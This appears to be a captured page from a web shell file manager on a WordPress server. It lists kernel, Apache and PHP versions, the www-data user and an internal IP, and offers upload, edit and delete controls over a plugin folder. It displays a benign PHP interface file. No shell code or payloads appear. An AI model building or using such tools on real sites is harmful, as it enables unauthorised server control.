[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
wp-optimize
/
vendor
/
matthiasmullie
/
path-converter
/
src
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 Converter.php
5,776 B
SET
[ EDIT ]
|
[ DEL ]
📄 ConverterInterface.php
527 B
SET
[ EDIT ]
|
[ DEL ]
📄 NoConverter.php
473 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: ConverterInterface.php
<?php namespace MatthiasMullie\PathConverter; /** * Convert file paths. * * Please report bugs on https://github.com/matthiasmullie/path-converter/issues * * @author Matthias Mullie <pathconverter@mullie.eu> * @copyright Copyright (c) 2015, Matthias Mullie. All rights reserved * @license MIT License */ interface ConverterInterface { /** * Convert file paths. * * @param string $path The path to be converted * * @return string The new path */ public function convert($path); }